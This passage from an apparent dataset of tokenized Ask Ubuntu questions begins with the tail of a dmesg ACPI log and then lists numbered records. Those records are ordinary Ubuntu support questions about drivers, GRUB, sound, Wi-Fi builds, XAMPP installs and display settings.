ali-aod255 : ~ $ dmesg | grep -i acpi [ 0.000000 ] bios-e820 : [ mem 0x000000007f577000-0x000000007f5befff ] acpi nvs [ 0.000000 ] bios-e820 : [ mem 0x000000007f5ec000-0x000000007f5fefff ] acpi data [ 0.000000 ] acpi : rsdp 000fe020 00024 ( v02 acrsys ) [ 0.000000 ] acpi : xsdt 7f5fe120 00064 ( v01 acrsys acrprdct 00000001 01000013 ) [ 0.000000 ] acpi : facp 7f5fd000 000f4 ( v04 acrsys acrprdct 00000001 1025 01000013 ) [ 0.000000 ] acpi : dsdt 7f5f1000 08d6f ( v01 acrsys acrprdct 00000001 1025 01000013 ) [ 0.000000 ] acpi : facs 7f584000 00040 [ 0.000000 ] acpi : hpet 7f5fc000 00038 ( v01 acrsys acrprdct 00000001 1025 01000013 ) [ 0.000000 ] acpi : apic 7f5fb000 00078 ( v02 acrsys acrprdct 00000001 1025 01000013 ) [ 0.000000 ] acpi : mcfg 7f5fa000 0003c ( v01 acrsys acrprdct 00000001 1025 01000013 ) [ 0.000000 ] acpi : slic 7f5f0000 00176 ( v01 acrsys acrprdct 00000001 1025 01000013 ) [ 0.000000 ] acpi : boot 7f5ef000 00028 ( v01 acrsys acrprdct 00000001 1025 01000013 ) [ 0.000000 ] acpi : ssdt 7f5ed000 00655 ( v01 pmref cpupm 00003000 intl 20051117 ) [ 0.000000 ] acpi : wdat 7f5ec000 00194 ( v01 insyde insyde 00000001 msft 01000013 ) [ 0.000000 ] acpi : local apic address 0xfee00000 [ 0.000000 ] acpi : pm-timer io port : 0x408 [ 0.000000 ] acpi : local apic address 0xfee00000 [ 0.000000 ] acpi : lapic ( acpi_id [ 0x01 ] lapic_id [ 0x00 ] enabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x02 ] lapic_id [ 0x01 ] enabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x03 ] lapic_id [ 0x00 ] disabled ) [ 0.000000 ] acpi : lapic ( acpi_id [ 0x04 ] lapic_id [ 0x00 ] disabled ) [ 0.000000 ] acpi : lapic_nmi ( acpi_id [ 0x01 ] dfl dfl lint [ 0x1 ] ) [ 0.000000 ] acpi : lapic_nmi ( acpi_id [ 0x02 ] dfl dfl lint [ 0x1 ] ) [ 0.000000 ] acpi : ioapic ( id [ 0x04 ] address [ 0xfec00000 ] gsi_base [ 0 ] ) [ 0.000000 ] acpi : int_src_ovr ( bus 0 bus_irq 0 global_irq 2 dfl dfl ) [ 0.000000 ] acpi : int_src_ovr ( bus 0 bus_irq 9 global_irq 9 high level ) [ 0.000000 ] acpi : irq0 used by override . [ 0.000000 ] acpi : irq2 used by override . [ 0.000000 ] acpi : irq9 used by override . [ 0.000000 ] using acpi ( madt ) for smp configuration information [ 0.000000 ] acpi : hpet id : 0x8086a201 base : 0xfed00000 [ 0.012225 ] acpi : core revision 20121018 [ 0.108314 ] pm : registering acpi nvs region [ mem 0x7f577000-0x7f5befff ] ( 294912 bytes ) [ 0.111405 ] acpi : bus type pci registered [ 0.114917 ] acpi : added _osi ( module device ) [ 0.114917 ] acpi : added _osi ( processor device ) [ 0.114917 ] acpi : added _osi ( 3.0 _scp extensions ) [ 0.114917 ] acpi : added _osi ( processor aggregator device ) [ 0.119212 ] acpi : ec : look up ec in dsdt [ 0.123126 ] acpi : executed 1 blocks of module-level executable aml code [ 0.127354 ] [ firmware bug ] : acpi : bios _osi ( linux ) query ignored [ 0.128403 ] acpi : ssdt 7f4b7790 00708 ( v01 pmref cpu0ist 00003000 intl 20051117 ) [ 0.129765 ] acpi : dynamic oem table load : [ 0.129772 ] acpi : ssdt ( null ) 00708 ( v01 pmref cpu0ist 00003000 intl 20051117 ) [ 0.130144 ] acpi : ssdt 7f4b5690 00646 ( v01 pmref cpu0cst 00003001 intl 20051117 ) [ 0.131056 ] acpi : dynamic oem table load : [ 0.131063 ] acpi : ssdt ( null ) 00646 ( v01 pmref cpu0cst 00003001 intl 20051117 ) [ 0.131111 ] acpi : ssdt 7f4b6d90 0015f ( v01 pmref apist 00003000 intl 20051117 ) [ 0.132907 ] acpi : dynamic oem table load : [ 0.132915 ] acpi : ssdt ( null ) 0015f ( v01 pmref apist 00003000 intl 20051117 ) [ 0.132945 ] acpi : ssdt 7f4b6f10 0008d ( v01 pmref apcst 00003000 intl 20051117 ) [ 0.133181 ] acpi : dynamic oem table load : [ 0.133187 ] acpi : ssdt ( null ) 0008d ( v01 pmref apcst 00003000 intl 20051117 ) [ 0.133218 ] acpi : interpreter enabled [ 0.133218 ] acpi : ( supports s0 s3 s4 s5 ) [ 0.133218 ] acpi : using ioapic for interrupt routing [ 0.271632 ] acpi : power resource [ fn00 ] ( on ) [ 0.272548 ] acpi : ec : gpe = 0x19 , i/o : command/status = 0x66 , data = 0x62 [ 0.272873 ] acpi : no dock devices found . [ 0.272885 ] pci : using host bridge windows from acpi ; if necessary , use `` pci=nocrs '' and report a bug [ 0.273675 ] acpi : pci root bridge [ pci0 ] ( domain 0000 [ bus 00-ff ] ) [ 0.273683 ] acpi : pci interrupt routing table [ \_sb_.pci0._prt ] [ 0.289605 ] acpi : pci interrupt routing table [ \_sb_.pci0.exp1._prt ] [ 0.289745 ] acpi : pci interrupt routing table [ \_sb_.pci0.exp2._prt ] [ 0.290078 ] pci0000:00 : requesting acpi _osc control ( 0x1d ) [ 0.290538 ] pci0000:00 : acpi _osc control ( 0x1c ) granted [ 0.292537 ] acpi : pci interrupt link [ lnka ] ( irqs 3 4 5 7 9 10 *11 12 ) [ 0.292688 ] acpi : pci interrupt link [ lnkb ] ( irqs 3 4 5 7 9 *10 11 12 ) [ 0.292833 ] acpi : pci interrupt link [ lnkc ] ( irqs 3 4 5 7 9 10 *11 12 ) [ 0.292978 ] acpi : pci interrupt link [ lnkd ] ( irqs 3 4 5 7 9 10 *11 12 ) [ 0.293123 ] acpi : pci interrupt link [ lnke ] ( irqs 3 4 5 7 9 10 11 12 ) *0 , disabled . [ 0.293269 ] acpi : pci interrupt link [ lnkf ] ( irqs 3 4 5 7 9 10 11 12 ) *0 , disabled . [ 0.293415 ] acpi : pci interrupt link [ lnkg ] ( irqs 3 4 5 7 9 10 11 12 ) *0 , disabled . [ 0.293572 ] acpi : pci interrupt link [ lnkh ] ( irqs 3 4 5 7 9 10 11 12 ) *0 , disabled . [ 0.296717 ] acpi : bus type scsi registered [ 0.296747 ] acpi : bus type usb registered [ 0.296747 ] pci : using acpi for irq routing [ 0.322754 ] pnp : pnp acpi init [ 0.322786 ] acpi : bus type pnp registered [ 0.384628 ] system 00:00 : plug and play acpi device , ids pnp0c02 ( active ) [ 0.384712 ] pnp 00:01 : plug and play acpi device , ids pnp0200 ( active ) [ 0.384819 ] pnp 00:02 : plug and play acpi device , ids pnp0b00 ( active ) [ 0.385054 ] pnp 00:03 : plug and play acpi device , ids pnp0103 ( active ) [ 0.385140 ] pnp 00:04 : plug and play acpi device , ids pnp0c04 ( active ) [ 0.385215 ] pnp 00:05 : plug and play acpi device , ids int0800 ( active ) [ 0.385352 ] pnp 00:06 : plug and play acpi device , ids pnp0303 ( active ) [ 0.385522 ] pnp 00:07 : plug and play acpi device , ids syn1b1c syn1b00 syn0002 pnp0f13 ( active ) [ 0.385863 ] pnp : pnp acpi : found 8 devices [ 0.385869 ] acpi : acpi bus type pnp unregistered [ 0.385876 ] pnpbios : disabled by acpi pnp [ 1.272199 ] acpi : ac adapter [ ac ] ( off-line ) [ 1.272363 ] acpi : power button [ pwrb ] [ 1.272469 ] acpi : sleep button [ slpb ] [ 1.272616 ] acpi : lid switch [ lid0 ] [ 1.272735 ] acpi : power button [ pwrf ] [ 1.272854 ] acpi : fan [ fan ] ( on ) [ 1.272990 ] acpi : requesting acpi_cpufreq [ 1.408392 ] acpi : thermal zone [ thrm ] ( 59 c ) [ 2.068247 ] acpi : battery slot [ bat0 ] ( battery present ) [ 26.088969 ] acer_wmi : acer laptop acpi-wmi extras [ 26.089283 ] acer_wmi : brightness must be controlled by acpi video driver [ 26.787802 ] acpi warning : 0x00000428-0x0000042f systemio conflicts with region \pmba 1 ( 20121018/utaddress-251 ) [ 26.787822 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 26.787832 ] acpi warning : 0x00000530-0x0000053f systemio conflicts with region \gpio 1 ( 20121018/utaddress-251 ) [ 26.787845 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 26.787851 ] acpi warning : 0x00000500-0x0000052f systemio conflicts with region \gpio 1 ( 20121018/utaddress-251 ) [ 26.787864 ] acpi : if an acpi driver is available for this device , you should use it instead of the native driver [ 28.855074 ] acpi device:27 : registered as cooling_device3 [ 28.855507 ] acpi : video device [ ovga ] ( multi-head : yes rom : no post : no )
322606	how do i install xampp on ubuntu ?	it 's way too complex for me . i need to use localhost ( php + mysql )
322610	preconfigured ubuntu install iso / custom installation routine	is it possible to take the ubuntu server iso and modify , so that you can create a custom installation routine ? the idea behind this is , that i 'm going to deploy ubuntu on a number of similiar pcs at work . they all need the same configuration , except for some variables , like network interfaces , etc . i do n't really want to run the setup on 50+ pcs and then afterwards run around and make all changes over and over again . so , is it possible to alter the installation routine of the ubuntu iso ? thing i would like to be able to do : add new input fields , like `` ip address '' add/remove default packages change config files
322614	are the drivers installed on my machine open source ?	i am using an asus x501a1 notebook . when i install ubuntu on it it does not require any extra driver installation to function properly . i am curious about this - are the drivers installed on my computer open source ?
322617	language indicator missing on ubuntu 13.04	after last update , i could n't find my language indicator , it has disappeared . is there any possible way to fix this ?
322618	problem with configuring sound - external usb dac - ubuntu 12.04	linux newbie here . i am having great difficulty configuring sound on my pc running ubuntu 12.04 since trying to use external usb dac / sound card so that i can play flac files via a hi-fi system . first try was an arcam rpac which i gather is not really all that compatible with linux . to get this to work at all i had to uninstall pulse audio and roll back to linux version 3.2.0.45 . i could then play flac files using foobar 2000 / wine but i could find no way of getting web-based sound to function . so i removed the rpac and used a behringer ufo202 external sound card instead . again , foobar / wine is happy to use this once the behringer is selected in foobar 'preferences ' . web-based sound is now available via the pc 's internal realtek sound card only and i ca n't find any advice on the forum that works to alter this . when i open 'sound settings ' the output box is blank and i get a message stating that 'no application is currently playing audio ' though my ears tell me otherwise ! ( i think this might be caused by pulse audio 's absence ) please help
322624	how do i convert a x86 rpm to a x86 deb within a x64 system ?	in my case the software i am trying to convert is the lacie lightscribe labeler . 1.- i renamed the rpm mv lacie\ lightscribe\ labeler\ 1.0\ linux.rpm lacie-lightscribe-labeler-1.0.rpm 2.- convert the package with alien sudo alien lacie-lightscribe-labeler-1.0.rpm error : lacie-lightscribe-labeler-1.0.rpm is for architecture i386 ; the package can not be built on this system i know that : i could do this in a x86 system and then copy it from there . use the simple labeler i 'm curious about how to do this conversion in general .
322628	grub problems ( but actually way more than just that )	i have an old xp machine that i installed ubuntu 12.04 on as a dual boot . eventually i decided that i no longer needed ubuntu ( was n't compatible with remote logmein ) , and tried to remove ubuntu using sub-par help topics on the internet . long story short , i ended up completely deleting the linux partition ( and what i assume was its swap space ) . i did not remove grub , thinking that it would still work and allow me to boot into windows until i could find an xp repair disk to restore the pc 's default bootloader/ completely restore the pc to factory . here is my problem . grub does not do anything but enter grub rescue , and my pc will not boot into either the windows utility partition or a winxp repair disk i burned when using the f12 boot menu . i want to basically put my pc back to how it was before i installed ubuntu , but i have dug myself into a hole . i am really stumped ...
322638	how to make 'sudo ' grab the password from a file ?	i want to run a command that requires the sudo password say : sudo apt-get update is n't this supposed to work ( i have stored the password in a normal text file passwd.txt ) : sudo apt-get update < ~/passwd.txt this is my logic for for why it should work : when the password is required , the user is asked to input the password from the keyboard . but redirecting the stdin to read from the passwd.txt file should work . should n't it ?
322642	patch for firefox	i have been recommended to install a patch to fix firefox bugs concerned bookmarks ( i.e . right mouse click not working & delays in showing bookmarks in a folder ) . i do not understand how to install the patch.however , i am not able to get an answer on launchpad ( bug 1195380 ) . the webpage showing the patch is at : http : //bazaar.launchpad.net/~mozillateam/firefox/firefox-trunk.head/view/head : /debian/patches/unity-menubar.patch help please !
322648	i can not connect internet through micromax 300g usb modem with bsnl data card on ubuntu 10.10.it does n't even identify modem attached.what to do ?	the details of the problem have been given in the question itself.i installed ubuntu 10.10 alongside windows 7 and wan na work internet on it but network applet does n't show any connection .
322651	online accounts not working	i am attempting to set up online account in ubuntu 13.04 , but whenever i select any service that does not use a frame to display login inputs ( aim , irc , ect . ) there is no way to input my info . i am presented with a gray screen that has the buttons done and cancel only .
322655	why does < alt > disable my mouse ?	playing world of warcraft through crossover , and in ubuntu 13.04 . i use my mouse to move which means i hold down both buttons to move , but when i hit my alt key ( modifier for ingame macros ) i stop moving and have to hit my mouse buttons again to move . this behaviour is specific to ubuntu 13.04 as this does not happen in mint15 .
322656	very low sound in ubuntu 13.04	this question may have been answered before but i have not found an answer so sorry if it has been asked multiple times . title pretty much says it all , my sound is very low when i installed ubuntu 13.04 on my toshiba satellite laptop , my sound was fine when i had windows but i decided to install ubuntu and run it with the lubuntu desktop environment and due to the extreme speed i decided to use ubuntu as my primary os and remove windows . anyway my sound is very low and it is on max and i made sure it is not muted in alsamixer , i 've also used the pulseaudio volume control and that is also on max . the sound is so low to the point that i ca n't hear it through my speakers except for a tiny bit once in a while , but i have to use my gaming headphones ( turtle beaches x12 ) and put the volume on max to hear sound , but it is still very low . any assistance ?
322660	searching files by ubuntu ; an improvement ?	can ubuntu add something like `` search everything '' software , with gui support and advantage of rapid searching ?
322664	ubuntu 13.04 screen calibration panasonic toughbook cf30	i am having problems keeping the touch screen calibrated after each restart . i have used this guide : http : //www.thefanclub.co.za/how-to/how-ubuntu-1204-touchscreen-calibration and have done and triple checked everything . can you help ? thank you .
322665	installing python modules to non-default interpreter [ ubuntu 10.04 ]	i had python 2.6 as default interpreter . i installed 2.7 and i can use it via command line # > python2.7 ... now i want to install some modules [ pymongo , mysqldb etc . ] using pip to this new version . i ca n't use sudo apt-get , or pip at commandline since , they install to 2.6 [ since , it is default ] some help solving this conundrum will be appreciated .
322666	linux grub does n't show up	last day i bought a laptop with nvidia g105m and intel core duo inside which has windows 7 default . as a linux fan , i wanted to install ubuntu to my laptop and i plugged in my old live usb ( which i used to install ubuntu to my desktop computer ) and followed instructions that the live usb said . but when i rebooted my computer , i got only a text cursor ( top-left corner ) : so i tried to install ubuntu several times but i got nothing . so i searched on the web and saw that nvidia users should use the nomodeset option . so i did it but it did n't solve my problem . i tried other ubuntu versions but nothing changed . so i searched the web again and found an article that says to me i should hold down the shift key . i did and i got that screen : i tried another linux distribution called linux mint but it gave me the same error . i reinstalled grub2 2 or 3 times again but it did n't work . i tried boot-repairing but it did n't work either . i am lost . am i doing something wrong ? should i update my bios or do what ? please help . i want my ubuntu ! : d edit : when i press the shift key i got thtis screen and when i use the `` ctrl+alt+delete key combination '' my computer reboots so bios boots my kernel , is n't it ?
322671	trying to get 3 finger gestures . geis tools shows only 2 finger support when i 've used 3 on windows 7 partition	i 've been trying to get touchegg to work so i can have 3 finger gestures similar to that on a macbook . it was n't working so i checked geis-tools for how many fingers are supported . it says 2 but then i realized i 've used 3 when i use my windows 7 partition . anybody know what the issue is ? i 'm on 12.04 lts
322673	trouble installing ubuntu on galaxy tab 2 7.0 p3110	everytime i try to install it , it all works but it boots up into a black screen
322674	unable to connect reliance netconnect+ zte ac2738 in ubuntu 12.04 lts	i am unable to connect my reliance netconnect+ ( zte ac2738 ) in ubuntu 12.04 lts . i have tried all the methods and options given to me but am unable to connect my usb modem . my provider said they support only till 10.04..
322675	how can i enable two installed versions of ubuntu to use a common swap space ?	i have an acer aspire one ao751h , and i 've got two ubuntu versions on it : 10.04.4 lts netbook edition ( which i keep around mainly because i really like the user interface ) and 12.04.2 lts . i have one primary and one extended partition , the former containing 10.04 alone , and the latter having 12.04 with its 2gb swap partition . my question is : will 10.04 recognize and use the swap space in the extended partition , or do i have to enable that ? if so , what is the procedure for doing so ? any help would be much appreciated .
322682	install from mounted iso , installation asks for second disk	i have 2 iso 's from a video game i used to play when i was a kid . i wanted to install them using wine . i first tried the following approach . created a mounting directory /mnt/disk/ then i mounted the .iso using mount -t iso9660 -o loop `` cd1.iso '' /mnt/disk/ went to the directory /mnt/disk/ and runned wine setup.exe installation proceeded till 50 % and then asks for cd2 . first cancelled the process wine setup.exe , installation is still running , then tried to unmount the drive using umount /mnt/disk/ -f which tells me that the drive is still busy and i can not unmount it . so here i failed ... i then tried to the following approach . created two mounting directories /mnt/disk1/ and /mnt/disk2/ mounted the cd1.iso using mount -t iso9660 -o loop `` cd1.iso '' /mnt/disk1/ mounted the cd2.iso using mount -t iso9660 -o loop `` cd2.iso '' /mnt/disk2/ went to the directory /mnt/disk/ and runned wine setup.exe installation proceeded till 50 % and then asks for cd2 . click on proceed , since i mounted it , however this also fails ... this approach also failed : ( does anyone have a clue how i can achieve this ?
322684	how to install compiz-plugin-extras and make it work correctly ?	i 'm still having problems with compiz ... i did everything that you imagine ... but `` animation add-on '' still does not appear in compiz ... i have already done the command apt-get install compiz-plugins-extras and compiz-plugins* to install all plugins but compiz still does not show the `` animation add-on '' ... what can i do ? i know this is not a big problem , but in any part of internet , people say how to enable the '' animation add-on '' they but already know this . i want to know how to get a `` complete '' install of compiz with all plugins . please post step by step . ( if i have to add new repository , if i have to move paste , if i have to download and extract and install the plugin ) ... step by step ... . i think it will help a lot of people who still have this question .
322687	there 's a file in my trash that ca n't be deleted	it says `` could not delete file '' every time i try to delete it . it 's actually not even a file , but an empty folder . when i have this issue in windows i usually use a program called unlocker , but i do n't think linux has anything similar .
322693	how do i turn off the display ( dpms ) without x ?	i 've been trying to switch off the built-in screen of a device i 've got , but i ca n't seem to completely control it without x running . if i run a gui ( i 've tried kubuntu 12.10 ) and issue the command xset dpms force off , the screen goes black , including the backlight . if i run a console os ( 12.04 lts ) , the screen blanks as expected after a few minutes of inactivity , but the backlight stays on dimly . i 've tried using setterm to manipulate the powersaving mode ( setterm -powersave powerdown , as well as a couple of variations ) , but there is a very faint glow from the backlight when the screen blanks in this way . the same happens if i use the sysfs interface , which does have a control method for the backlight ( it just does n't switch it off completely ) . i 've looked at the xset source and discovered that it sends an internal `` opcode '' seemingly called dpmsforcelevel to the x server . at this point , i got a bit lost and ran out of time . i intend to have another go at following the source , but i 'd love it if anyone can offer any insight ! background the device is an o2 joggler . it 's an intel atom based device with what i 'm led to believe is a sharp touchscreen and an intel gma500 gpu ) . i was hoping not to have to run x , so if i can send the screen hardware the correct commands without , i 'd be happy . i am aware of vbetool , which is supposed to offer this sort of control of display hardware , but unfortunately , i tried it and got nowhere ( error : something went wrong performing real mode interrupt ) .
322694	jre not showing up in `` open with '' list	i am trying to install minecraft on to my computer and i was able to do everything except change the .jar to `` open with '' jre . jre does not appear in the list of programs -running ubuntu 13.04 -have jre 6/7
322696	how do i move all my torrents from transmission to deluge ?	what is the easiest way to move all my torrents ? i 'm not happy with transmission 's lack of features .
322702	komodo edit : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed	when i try to run komodo edit 8.0 from terminal , it returns me this error : ( process:9508 ) : glib-critical ** : g_slice_set_config : assertion `sys_page_size == 0 ' failed how can i fix this ? note : nevertheless , the application lauches and runs properly .
322704	how to install xampp 1.8.2.0 installer.run does n't start	how can i install the new xampp ? i tried out various tutorials , but it still does not work . if i type in ./xampp-linux-1.8.2-0-installer.run nothing happens ( it shows me root @ ubuntu : /home/pc/downloads # ) . please help me .
322706	upon exiting ubuntu on usb drive , all settings and new data are erased . how can i retian data and settings ?	i have ubuntu installed on a usb flash drive . it works fairly well . but every time i exit the system , it erases all newly created data and settings . e.g. , the add-nos in firefox are deleted and all the other settings , like bookmarks . all downloaded files are deleted . when i boot up the system again , only the original system appears . how can i get ubuntu to not delete the settings and newly added data upon exiting the system ?
322707	ubuntu 13.04 amd64 : libnm-glib problem	i 'm using a webstick part time for internet connection . after several break ups of my provider , instead of getting a new connection , i get this answer : connection activation failed ( 1 ) creating object for path '/org/freedesktop/networkmanager/activeconnection/3 ' failed in libnm-glib . then i need to restart the whole thing , log out and log in alone would not cure this pest . any hint please available , thank you .
322708	which graphic driver should i install ?	when i give in this command to find out which graphic card is present in my laptop working on ubuntu 12.10 : lspci | grep vga i get the following result : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati caicos [ radeon hd 6400m/7400m series ] from the following link i read that there is something called integrated graphic card and a `` discrete '' one ; how to manage graphics cards ? please correct me if my logical consequences are not right i assume that i have to install a driver for the discrete graphic driver . i have been trying to install a graphic driver for many times but i did n't manage it at all . i 've seen that many people have problems installing a working graphic driver and i did read many questions and followed many many suggestions but the results were merely the same ; you could read at booting when i tried to install the propriatery amd graphic driver - as example from the software center : the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present can someone give me a hint to install the correct propriatery graphic driver for my graphic card ?
322727	ca n't launch android studio	i have a fresh installation of android studio . keep getting this : 'tools.jar ' seems to be not in android studio classpath . please ensure java_home points to jdk rather than jre . how to make it work ? java version : java version `` 1.7.0_25 '' java ( tm ) se runtime environment ( build 1.7.0_25-b15 ) java hotspot ( tm ) server vm ( build 23.25-b01 , mixed mode ) javac version : javac 1.7.0_25 /etc/profile java_home=/usr/local/java/jdk1.7.0_25 path= $ path : $ home/bin : $ java_home/bin jre_home=/usr/local/java/jre1.7.0_25 path= $ path : $ home/bin : $ jre_home/bin export java_home export jre_home export path
322728	ubuntu touch on nexus 4 fails to boot	last week i tried ubuntu touch on my nexus 4 , and it was easy to install en to recover to android . so today i wanted to show the preview to some friends , and something has gone very wrong . current status : on boot i get a black screen bootloader does work ( volume down + power on ) recovery mode gives me black screen what i have done : 1 updated my system ( sudo apt-get update ) 2 installed ( sudo phablet-flash -b ) after that my phone hang on the google logo while booting . started recovery mode and started poking around . < - probably my first mistake . 3 tried to reinstall ( sudo phablet-flash -b ) but did n't work . gave error that i should use -d. 4 tried reinstall with ( phablet-flash -d grouper -b ) . can someone help me out on getting android back on my phone , because i do n't know what to do . `` adb devices '' tells me that there are no devices attached , so i really dont know how to reinstall or recover .
322729	weird artifacts when pressing alt+tab	when i press alt + tab to switch between windows , the view messes up ( not always , but very often ) . sometimes it shows just noise where every pixel is another color , and sometimes it shows artifacts from other ( closed ) programs . here is a screenshot , the stuff in the upper half of the screen is from a game i had opened about an hour ago . i have two screens , this is the smaller one : i think this problem started when i installed compizconfig , i 'm not sure . system : • ubuntu 12.04 lts 64-bit • graphics driver vesa : park • ati/amd radeon hd 5430 does anyone else have this problem or know how to fix it ?
322730	update manager giving error message	every time i click the `` check '' button in the update manager i get an error message `` failed to download repository information , check your internet connection '' . under details it lists these errors : w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/precise/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/cooperjona/stormcloud/ubuntu/dists/precise/main/binary-i386/packages 404 not found and , there is a triangle with ! in it in the notification bar telling me the update information is `` out of date '' . what is going on and how do i fix it ? please remember i am an absolute beginner and will need more detailed instructions than someone with more experience , but i 'm learning .
322731	rtl8188ee make errors on 13.04 ( l75d-a7280 )	i 'm trying to setup my wifi on a fresh 13.04 install on a toshiba satellite l75d-a7280 . i 'm still a linux noob , so i may have gone down the rabbit hole , but i 've made it this far : http : //webcache.googleusercontent.com/search ? q=cache : hak00i57nh4j : ubuntuforums.org/showthread.php % 3ft % 3d2162026+rtl8188ee+ubuntu+wireless & cd=1 & hl=en & ct=clnk & gl=us & client=browser-ubuntu http : //webcache.googleusercontent.com/search ? q=cache : x64azzpqfmcj : ubuntuforums.org/showthread.php % 3ft % 3d2146803+ & cd=1 & hl=en & ct=clnk & gl=us & client=ubuntu i 've edited pci.h as recommended , but i 'm still getting this on make : make -c /lib/modules/3.8.0-19-generic/build m=/home/trevor/downloads/realtek modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-19-generic' cc [ m ] /home/trevor/downloads/realtek/base.o in file included from /home/trevor/downloads/realtek/base.c:39:0 : /home/trevor/downloads/realtek/pci.h:30:1 : error : unknown type name ‘fndef’ /home/trevor/downloads/realtek/pci.h:33:2 : error : # endif without # if in file included from include/linux/pci.h:20:0 , from /home/trevor/downloads/realtek/pci.h:39 , from /home/trevor/downloads/realtek/base.c:39 : include/linux/mod_devicetable.h:12:1 : error : expected ‘=’ , ‘ , ’ , ‘ ; ’ , ‘asm’ or ‘__attribute__’ before ‘typedef’ include/linux/mod_devicetable.h:21:2 : error : unknown type name ‘kernel_ulong_t’ include/linux/mod_devicetable.h:36:2 : error : unknown type name ‘kernel_ulong_t’ include/linux/mod_devicetable.h:37:33 : error : ‘kernel_ulong_t’ undeclared here ( not in a function ) include/linux/mod_devicetable.h:37:3 : error : requested alignment is not an integer constant include/linux/mod_devicetable.h:125:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:151:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:164:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:178:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:189:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:197:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:205:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:210:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:275:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:324:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:351:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:376:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:423:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:443:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:454:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:518:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:550:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:561:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ include/linux/mod_devicetable.h:592:2 : error : expected specifier-qualifier-list before ‘kernel_ulong_t’ make [ 2 ] : *** [ /home/trevor/downloads/realtek/base.o ] error 1 make [ 1 ] : *** [ _module_/home/trevor/downloads/realtek ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-19-generic' make : *** [ all ] error 2 how can i get my wireless working ? lspci -nnk | grep -iea3 `` ( wireless|network ) '' 05:00.0 network controller [ 0280 ] : realtek semiconductor co. , ltd. rtl8188ee wireless network adapter [ 10ec:8179 ] ( rev 01 ) subsystem : realtek semiconductor co. , ltd. device [ 10ec:0181 ] wired connection working i am happily connected and talking to the world on my first ubuntu lappie via the wired connection . i do not know what driver it 's using . 13.04 saw it during installation .
322732	ubuntu 13.04 slow boot on insipiron 15r se	i have a `` trial-boot '' win7 , win8 and ubuntu 13.04 , getting some extreme slowly boot on ubuntu ... win8 and win7 works fine ... here is my bootchart . some one knows how to fix it ?
322739	ubuntu updates to be moved to different partion	i have partions in my hdd . it has been divded into 100 gb , 200gb and 200gb . whenever i am installing updates , they go to the main partion which is only 100gb . is there a way to move it to other partions ?
322741	touchpad permanently disabled after using ambient light sensor button	i am using an hp/compaq 8710p and it has an ambient light sensor enable/disable button using fn+f11 . i enabled the ambient light sensor and a notification popped up saying , `` touchpad disabled . '' after pressing fn+f11 again , the light sensor disabled , but the touchpad still does not work . how do i go about re-enabling the touchpad , and possibly fixing the ambient light sensor to not use the touchpad ? i am using kubuntu 13.04 .
322744	disable automatic screen dimming	i currently have three computers running ubuntu . with two of them , if i do n't touch the mouse or keyboard ... nothing happens . however , with the third , the screen gets dimmer after about 60 seconds of inactivity . i ca n't seem to figure out how to prevent this . i 've tried using the control center ( gnome-control-center -- overview ) , entering the `` brightness and lock '' screen , and unchecking the `` dim screen to save power '' checkbox , but that does n't actually seem to have any effect on the issue . i 'm running 32-bit ubuntu 13.04 , with the cinnamon desktop . i also used to have kde-plasma , although i decided to get rid of it . any ideas ?
322746	linux folder deleted from rubbish bin in dual-boot win 7	dear helper , when inserting the ubuntu 12.4 c.d . within win 7 it automatically recognizes a c : ubuntu installation ( that it informs is to be deleted before a re-instillation can proceed ) . if it recognizes that it exists , can be recovered easily ? a windows data recovery program could not find any trace of linux . if i have to delete , then as i am a beginner then it is risky to start shrinking the c : drive . details : the dual boot option still remains , but an error message '' replaces a linux boot fileubuntu/winboot /wubi lbr.mbr status oxc000000f app . missing or corrupt the 4 partitions show the following and the free space tables are something else . on the c ; drive it was something like 150 gb . that would i suppose where the folder was installed . system 199 mb ntfs os c : 282.29 gb ntfs recovery ( d : ) 15.30 gb ntfs hp toos 103 mb fat 32 cheers greenmoon
322749	ubuntu touch core apps | database version mismatch	i am not able to run ubuntu touch core apps properly . it was running fine until i installed qt5 along with qt4 . i tried removing all and installing ubuntu-sdk from scratch . but still no luck . error error : sql : database version mismatch [ clock ] timerpage loaded qsqldatabaseprivate : :database : unable to open database : `` `` qsqlquery : :prepare : database not open [ clock ] [ error ] error creating worldclock table in db : error : when i run the app , header , divider is not shown and controls not shown on swiping from the bottom . background is not shown properly . how do i solve this sql db version mismatch
